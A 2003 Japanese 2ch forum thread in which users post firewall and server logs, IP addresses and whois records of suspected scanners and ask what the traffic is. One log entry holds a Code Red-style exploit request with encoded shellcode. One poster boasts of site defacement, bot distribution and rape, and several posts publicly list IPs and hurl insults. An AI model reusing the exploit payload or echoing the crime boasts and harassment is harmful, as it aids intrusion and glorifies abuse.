Sep 7 00:54:24 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0

こういうのって、普通の出来事なんでしょうか？

219.164.197.169

10.6.47.243
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
NetRange: 10.0.0.0 - 10.255.255.255
CIDR: 10.0.0.0/8
NetName: RESERVED-10
NetHandle: NET-10-0-0-0-1
Parent:
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: This block is reserved for special purposes.
Comment: Please see RFC 1918 for additional information.
Comment:
RegDate:
Updated: 2002-09-12
OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: [email protected]

OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail: [email protected]

03/09/08 午前 9:20:12通信の要求211.196.154.209TCP(1509)

>>756
　
　　a1021.lm.a.yimg.com
　　a211-10-246-138.deploy.akamaitechnologies.com

　こいつらって何なの？知ってるの？
　　

>>806
akamaitechnologies.comはyahooにアクセスするとき通信してるみたいだったけど。

a211-10-246-138.deploy.akamaitechnologies.com
こいつのポートスキャン激しくウザイんだよ、しかも
ログを見ると”a1021.lm.a.yimg.com” こいつと、つるんでるみたいだから
もうIPレンジでフィルタかけたんだけど。

220.211.223.77:7743 (pd3df4d.ykhmac00.ap.so-net.ne.jp)
218.43.134.43:1268 (p4043-ipad12sasajima.aichi.ocn.ne.jp)
218.220.192.72:26497 (zaqdadcc048.zaq.ne.jp)
61.192.98.175:17265 (zaq3dc062af.zaq.ne.jp)

>>806
akamaitechnologies.com
ごくフツーの人にはあまり知られていないが、ちょー凄い集団だ。
かなりの数のマシンを持っており、保持するIPも広範囲。
もし本当に攻撃されれば、もうだめぽ。

なぜかスキャンされてるといった程度なら、放置汁。
内部からのアクセスによる情報漏れが禿しく気になるのであれば
IPを遮断するしかない。

ほんと複数のIPでそれぞれ同じことを同時にしてくるから
うざくて。

akamaitechnologies.comってサンスポやZAKZAKの入ってる鯖やじゃないの？

>>808
こんな糞スレに書き込むから馬鹿にされちゃうんだよ。

whois -h whois.opensrs.net akamaitechnologies.comすりゃ
akamaitechnologies.comを誰が持っているかわかるわけだ。
んでもって、http://www.akamai.com/に行けば日本語のサイトがhttp://www.akamai.co.jp/だとわかるわけだ。
どういう事をやってる企業か調べてみろ。

>>813よ、俺のところにアタックしに来ていたのは、ここを踏み台にしていた「夏厨」じゃなくて、
「eビジネスで飯を食ってるやつらが串も刺さずにやってきた！」と言うことか？

FWIN,2003/09/08,18:44:58 +9:00 GMT,211.10.246.139:80,192.168.1.100:2872,TCP (flags:S)
FWIN,2003/09/08,18:45:42 +9:00 GMT,211.10.246.144:80,192.168.1.100:2859,TCP (flags:S)
FWIN,2003/09/08,18:46:02 +9:00 GMT,211.10.246.144:80,192.168.1.100:2903,TCP (flags:S)
FWIN,2003/09/08,18:46:12 +9:00 GMT,211.10.246.144:80,192.168.1.100:2964,TCP (flags:S)
FWIN,2003/09/08,18:46:16 +9:00 GMT,211.10.246.139:80,192.168.1.100:2948,TCP (flags:S)
FWIN,2003/09/08,18:46:42 +9:00 GMT,211.10.246.144:80,192.168.1.100:2902,TCP (flags:S)
FWIN,2003/09/08,18:46:48 +9:00 GMT,211.10.246.144:80,192.168.1.100:2868,TCP (flags:S)
FWIN,2003/09/08,18:46:48 +9:00 GMT,211.10.246.139:80,192.168.1.100:2952,TCP (flags:S)
FWIN,2003/09/08,18:46:56 +9:00 GMT,211.10.246.139:80,192.168.1.100:2773,TCP (flags:S)
FWIN,2003/09/08,18:46:58 +9:00 GMT,211.10.246.139:80,192.168.1.100:2872,TCP (flags:S)
FWIN,2003/09/08,18:47:02 +9:00 GMT,211.10.246.139:80,192.168.1.100:2894,TCP (flags:S)
FWIN,2003/09/08,18:47:04 +9:00 GMT,211.10.246.139:80,192.168.1.100:2879,TCP (flags:S)
FWIN,2003/09/08,18:47:40 +9:00 GMT,211.10.246.139:80,192.168.1.100:2954,TCP (flags:S)

http://ula2ch.muvc.net/　(このカキコは削除しても良いです)

202.212.115.106
211.5.1.243

uzeeeeeeeeeee

>>814
それは、ウェブのアクセスの戻りのパケットを誤認したと見せかけた
ポートスキャンに違いない。

攻撃されたので
一応晒しときまつ

211.1.235.247

明石らしいですが・・・

お心当たりの方は

↓　に、お問い合わせを。

03/08/24 20:33 HOST:61-195-150-89.cust.bit-drive.ne.jp

２ｃｈ日本史で何回も事実無根の誹謗中傷を書き立てるなよ！
個人サイトにも、１日に１０回もアクセスしたりして・・・

>>808
お前は攻撃される価値があるのか？

俺には攻撃される価値があるなぁ。

これでも荒らし界のネ申でしたので。
サイト改ざんまでした事あるけど捕まらなかった。
知り合いが鯖関係者なんでね。色々情報変えてくれたんだよ。
ネットで出会った女、犯したけど捕まらなかった。
BOT配布ごときで捕まることはないでしょう。

俺に文句言いたけりゃ生で来てくれ。
お前等に俺を叩く権利ないって事で削除＆そのIPは規制（プ

http://www.geocities.co.jp/SiliconValley-PaloAlto/4733/

zaqd38758b9.zaq.ne.jp
211.135.88.185

IPアドレス 219.160.209.208
ホスト名 p3208-ipad02otsu.shiga.ocn.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 滋賀県
市外局番 --
接続回線 xDSL

IPアドレス 219.160.209.208
ホスト名 p3208-ipad02otsu.shiga.ocn.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 滋賀県
市外局番 --
接続回線 xDSL

220.209.99.105

220.209.99.105

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.209.75.0-220.209.182.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)

粘着アタッカー

32.103.25.252[slip-32-103-25-252.ca.us.preserv.net]
侵入:Invalid TCP Source Port

いつもはトロイの木馬が多いのに、珍しいな。

218.178.238.35

んで・・・、
何度も言うようだけど踏み台晒してなんか楽しい？

みなさんアタックされたらどうしてるのですか?
報復するのですか?

攻撃とは限らない。ただのポートスキャンに一々反応してられるか。

俺、暇なときはポートスキャン返してるけどなぁ。
挨拶されたら挨拶返しなさいと、死んだばぁちゃんも言ってたし。

むしろ、通行人と目が合っただけで挨拶してるよう。

219.12.116.51

129.71.16.159

　ポートをブロックするプログラムをいれてますが
２ちゃんを閲覧していたら、２ちゃんのアドレス
64.71.145.43（2ch.net）から自マシンの
ポート2770と2766に対するアクセスが２件ありました。

こういったことがある方他に居られるでしょうか？
またどういった原因が考えられますでしょうか。

81.218.189.14

24.154.111.127

220.104.1.107

(1)
Received: from remt21.cluster1.charter.net (remt21.cluster1.charter.net [209.225.8.31])by mail512.nifty.com with ESMTP id h8J6HdF9012653
　for <******>; Fri, 19 Sep 2003 15:17:39 +0900
Received: from [66.168.197.67] (HELO mkid)
　　　　　　　　　　 ~~~~~~~~~~~~~
　 by remt21.cluster1.charter.net (CommuniGate Pro SMTP 4.0.6)
　 with SMTP id 163170716; Fri, 19 Sep 2003 02:17:22 -0400

(2)
Received: from remt30.cluster1.charter.net (remt30.cluster1.charter.net [209.225.8.40])by mail522.nifty.com with ESMTP id h8J6FO97012818
　for <******>; Fri, 19 Sep 2003 15:15:25 +0900
Received: from [66.168.197.67] (HELO uugmgp)
　　　　　　　　　　 ~~~~~~~~~~~~~
　 by remt30.cluster1.charter.net (CommuniGate Pro SMTP 4.0.6)
　 with SMTP id 32267368; Fri, 19 Sep 2003 02:15:03 -0400

(3)
Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43])by mail523.nifty.com with ESMTP id h8CLQcXc012010
　for <******>; Sat, 13 Sep 2003 06:26:39 +0900
Received: from DrJiR ([80.5.46.35]) by mta03-svc.ntlworld.com
　　　　　　　　　　　　　　　~~~~~~~~~~
　 (InterMail vM.4.01.03.37 201-229-121-137-20020806) with SMTP
　 id <20030912212620.GKNK19737.mta03-svc.ntlworld.com@DrJiR>;
　 Fri, 12 Sep 2003 22:26:20 +0100

(4)
Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])by mail507.nifty.com with ESMTP id h7E0EG18008557
　for <******>; Thu, 14 Aug 2003 09:14:16 +0900
Message-Id: <******@mail507.nifty.com>
Date: Thu, 14 Aug 2003 00:14:05 +0000 (GMT)
X-Comment: Sending client does not conform to RFC822 minimum requirements
X-Comment: Date has been added by Maillennium.
Received: from kkmUQ (12-241-35-137.client.attbi.com[12.241.35.137](untrusted sender))
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ~~~~~~~~~~~~~
　 by comcast.net (rwcrmhc11) with SMTP
　 id <20030814001359013006k5h8e>; Thu, 14 Aug 2003 00:14:03 +0000

(5)
Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])by mail507.nifty.com with ESMTP id h7E0EG18008557
　for <******>; Thu, 14 Aug 2003 09:14:16 +0900
Message-Id: <******@mail507.nifty.com>
Date: Thu, 14 Aug 2003 00:14:05 +0000 (GMT)
X-Comment: Sending client does not conform to RFC822 minimum requirements
X-Comment: Date has been added by Maillennium.
Received: from kkmUQ (12-241-35-137.client.attbi.com[12.241.35.137](untrusted sender))
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ~~~~~~~~~~~~~~
　 by comcast.net (rwcrmhc11) with SMTP
　 id <20030814001359013006k5h8e>; Thu, 14 Aug 2003 00:14:03 +0000

(6)
Received: from allcom.gdynia.pl (mail.allcom.gdynia.pl [193.91.30.26])by mail521.nifty.com with ESMTP id h8JBp6xJ001141
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ~~~~~~~~~~~~
　for <******>; Fri, 19 Sep 2003 20:51:15 +0900
Received: from localhost (localhost [127.0.0.1])
　by allcom.gdynia.pl (Postfix) with ESMTP
　id 8CC1D7FC70; Fri, 19 Sep 2003 13:48:09 +0200 (CEST)
Received: from allcom.gdynia.pl ([127.0.0.1])
　 by localhost (allcom [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
　 id 31423-03; Fri, 19 Sep 2003 13:48:08 +0200 (CEST)
Received: from ltxgj (unknown [10.100.5.145])
　by allcom.gdynia.pl (Postfix) with SMTP
　id 325957FC66; Fri, 19 Sep 2003 13:48:08 +0200 (CEST)

pcd383230.netvigator.com

Internet Assigned Numbers Authority

これってどこの会社だよ。
激しくうざいんだけど

(7)
Received: by mail54.nifty.com id 3f6b3d6b5fe34e;
　Sat, 20 Sep 2003 02:31:23 +0900
Received: from ms-smtp-01.southeast.rr.com (ms-smtp-01.southeast.rr.com [24.93.67.82])by mail511.nifty.com with ESMTP id h8JHVGsb029649
　for <********>; Sat, 20 Sep 2003 02:31:17 +0900
Received: from nqeflqt (clt56-125-103.carolina.rr.com [66.56.125.103])
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　~~~~~~~~~~~~~
　by ms-smtp-01.southeast.rr.com (8.12.5/8.12.2) with SMTP id h8JHKG0Q001412;
　Fri, 19 Sep 2003 13:20:17 -0400 (EDT)

220.108.225.230

さっきからTCP/445ばっか叩いてんじゃねえよ。

127.0.0.1
このひとしつこい

>>849
それはお前のローカルアドレスだろ。

>>849
>>850
http://pc.2ch.net/test/read.cgi/sec/1064122787/l50
うちは来たことないけど上がはじいてるのかな？
意図がいまいちわからんけどこれって結局なんだろう？

211.93.13.166

会社のWeb鯖にアノニでログインしようとするんだが、何がしたいんだこの糞会社？

219.106.138.196 UNKNOWN nobody [23/Sep/2003:01:13:34 +0900] "USER anonymous" 331 -
219.106.138.196 UNKNOWN nobody [23/Sep/2003:01:13:34 +0900] "PASS (hidden)" 530 -

[IPネットワークアドレス] 219.106.136.0-219.106.143.0
[ネットワーク名] BAI-CATV
[組織名] アイテック阪神株式会社
[Organization] ITEC HANSHIN CO.,LTD.
[運用責任者] NH183JP
[技術連絡担当者] TM947JP
[技術連絡担当者] TK588JP
[ネームサーバ] ns1.gao.ne.jp
[ネームサーバ] ns2.gao.ne.jp
[通知アドレス] [email protected]

カスども、まだやってるのか?

68.20.216.234

202.8.29.213

218.13.198.21

sttldslgw9poole163.sttl.uswest.net - - [27/Sep/2003:00:39:21 +0900] "GET /frame.jpg?1064038450843 HTTP/1.0" 403 1067 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
こういうのが約３０秒おきに飛んでくる。

xx-22x-8x-15x.hinet-ip.hinet.net - - [26/Sep/2003:18:12:59 +0900]
"GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%
u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%
ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x つづく

172.160.173.250

200.153.234.82

200-153-234-82.dsl.telesp.net.br

68.161.60.70

今晩はしつこい。

韓国がウザい。

SRC=220.108.220.155 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=50649 DF PROTO=TCP SPT=3333 DPT=445 WINDOW=65535 RES=0x00 SYN URGP=0

こんな感じで30分以上。。。ログの行数数えるのも だるい。

219.111.157.84

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.111.128.0-219.111.191.0
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service

62.178.106.132

210.52.154.0

ブレーメンの不正侵入隊
134.102.65.110:111

81.86.202.132

65.33.228.75

68.164.56.56

IPアドレス 211.134.86.52
ホスト名 O086052.ppp.dion.ne.jp
接続回線 xDSL
他

61.124.67.96

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)

169.254.0.8

一ヶ月も前から日参されてうざい…。
しかも１分間に１００回を越えるアタックでルーター止まるし…（←根性なし）ｗ
横文字苦手なんで何処からやらﾜｶﾗﾝ。


OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 169.254.0.0 - 169.254.255.255
CIDR: 169.254.0.0/16
NetName: LINKLOCAL
NetHandle: NET-169-254-0-0-1
Parent: NET-169-0-0-0-0
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: Please see RFC 3330 for additional information.
RegDate: 1998-01-27
Updated: 2002-10-14

>>875
馬鹿はwhois使用禁止。

>>875
ローカルアドレスとは何か勉強すると、あなたが貼ったWhoisが恥ずかしくなるよ。

61.185.218.154

>>875
ﾍﾞﾝｷｮｼﾙ
http://www5d.biglobe.ne.jp/~stssk/rfc3330j.html

211.183.93.215:1735

210.15.11.115
220.220.105.54
61.196.2.176

68.32.116.168

68.248.122.13:1129

219.104.103.67

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.104.0.0-219.104.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)

↑カス供死ね。

67.202.109.53

>>885

オマエが死ね

低脳どもはどうして低脳といわれているかわからないようだ。

これは犯罪文ですか？
「●の仲間でいることを恥たほうがいい。

●が出入りしてるせいで、いつのまにか友達減ったの気づいてないの？
自分では普通のつもりでも、周りは同じ人種と判断するからねぇ…
そして、何がすごいって、●、まじであっちこっちで嫌われてるね。
知らないところで悪口言われてるよ。
こんなに嫌がられてる人も珍しいよなぁ…はじめてみたかも。
相変わらず悪口たくさんかかれてる鼻つまみ者」

これを公の場で書く奴
しかも、嘘ばっかり言いふらしてます。ＨＰ管理妨害です。
これは偽証罪では？

こいつのせいで、えん罪ですよ。

218.222.143.166
U143166.ppp.dion.ne.jp

↑また来たか。屑。

64.4.22.24

92.163.3.1 　

OrgName: Texas Instruments
OrgID: TEXASI-4
Address: 13500 North Central Expressway
City: Dallas
StateProv: TX
PostalCode: 75243
Country: US

NetRange: 192.163.3.0 - 192.163.3.255
CIDR: 192.163.3.0/24
NetName: TISPDC-3
NetHandle: NET-192-163-3-0-1
Parent: NET-192-0-0-0-0
NetType: Direct Assignment
Comment:
RegDate: 1992-05-08
Updated: 1992-05-08

# ARIN WHOIS database, last updated 2003-10-08 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

ホスト名: adsl-67-116-216-25.dsl.sndg02.pacbell.net
ＩＰアドレス: 67.116.216.25

ここから攻撃を受けているんですけど、なんなんでしょうか。
ほかにもたくさんくるんですけど。主にアメリカみたい。

IPアドレス 80.182.119.102
ホスト名 host102-119.pool80182.interbusiness.it
割当国　※ イタリア (IT)

φ（ ．．）
BlackICE PC Protectionによると 遮断状況, 侵入者
1, zaqd378a033.zaq.ne.jp
1, public4-seve1-3-cust14.lond.broadband.ntl.com　英国ケンブリッジ
1, pcp444009pcs.savana01.ga.comcast.net　米国アトランタ
1, p5019-ipad01tokusinwcc.tokushima.ocn.ne.jp
1, p1177-ipbf07hodogaya.kanagawa.ocn.ne.jp
1, nttkyo145077.tkyo.nt.ftth2.ppp.infoweb.ne.jp
1, ntfkok053042.fkok.nt.ftth.ppp.infoweb.ne.jp
1, nissin42100.ccnw.ne.jp
1, i211099.ppp.asahi-net.or.jp
1, gate80.people-i.ne.jp
1, flhyg1-p194.hi-ho.ne.jp
1, adsl-66-136-95-70.dsl.rcsntx.swbell.net　米国テキサス州リチャードソン
1, adsl-158-181-135.mia.bellsouth.net　米国マイアミ州
1, aa2001080079003.userreverse.dion.ne.jp
1, YahooBB221090008001.bbtec.net
1, YahooBB220043232122.bbtec.net
1, YahooBB220043232051.bbtec.net
1, YahooBB219186232002.bbtec.net
1, YahooBB219025144008.bbtec.net
1, YahooBB219006058012.bbtec.net
1, U015106.ppp.dion.ne.jp
1, FLH1Aah253.sig.mesh.ad.jp
1, 64.49.220.233　米国カリフォルニア州バーバンク
1, 61-22-163-229.home.ne.jp
1, 218.90.217.206　中国 北京
中国 北京は(パロ・アルト経由)サンフランシスコ近郊の都市を経由
1, 218.234.128.2　韓国ソウル
1, 218.231.78.9.eo.eaccess.ne.jp
1, 211.75.173.44　台湾
1, 198.209.2.162　米国イリノイ州

>>896
何か悪いことでもしたの？

医療法人千徳会
何か用？

4.43.174.223

>>899　さん
4.43.174.223は、エヴェレット（シアトルの近くにある街）からの
　アタックです。
カリフォルニア州ミルピタス経由で899さんのPCまで来たみたいです。
VisualRoute日本語版で追跡して解った事の詳細↓（一部不要な所をカット済み）
Verizon Trademark Services LLC [email protected]
Verizon Trademark Services LLC
1320 North Court House Road
Arlington, VA 22201
US
1-9727187621
FAX: 1-9727183946
Domain Name: DSL-VERIZON.NET
Domain Status: Client Locked
Administrative Contact:
Christian R. Andersen [email protected]
Verizon
600 Hidden Ridge Drive HQE03H01
Irving, TX 75038
US
1-9727187621
Record last updated on:..2002-04-04 00:00:00.0
Record expires on:.......2005-04-04 00:00:00.0
Record created on:.......2002-04-04 00:00:00.0

Domain Name Servers:
dnsauth1.sys.gtei.net 4.2.49.2
dnsauth2.sys.gtei.net 4.2.49.3

>>897さん、　896ですが
してません

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.238.32.0-202.238.39.0
b. [ネットワーク名] MICSNET
f. [組織名] 株式会社西三河ニューテレビ放送
g. [Organization] Nishimikawa New-TV Broadcasting CORPORATION
m. [運用責任者] YN2945JP
n. [技術連絡担当者] JN445JP
n. [技術連絡担当者] KI4020JP
n. [技術連絡担当者] KM1184JP
n. [技術連絡担当者] TS7372JP
p. [ネームサーバ] ns.catvmics.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2001/03/16
[最終更新] 2002/01/21 10:37:31 (JST)
[email protected]

03/07/27の23:18:24〜23:37:25に渡って計21回

24.158.189.224

今日3回目
24.44.221.134

210.186.58.164:1101

62.163.180.166

cpe-024-211-082-036.sc.rr.com

43.244.38.176
43.244.160.219
43.244.244.190

詳しい人、教えてください。
毎日100回くらい、ログに残ってるの。
43.244までは、同じだけど、後ろの数字が変化してます。

激しくトロイ
http://marmotfarm.com/cgi-bin/upload2/source/up21895.jpg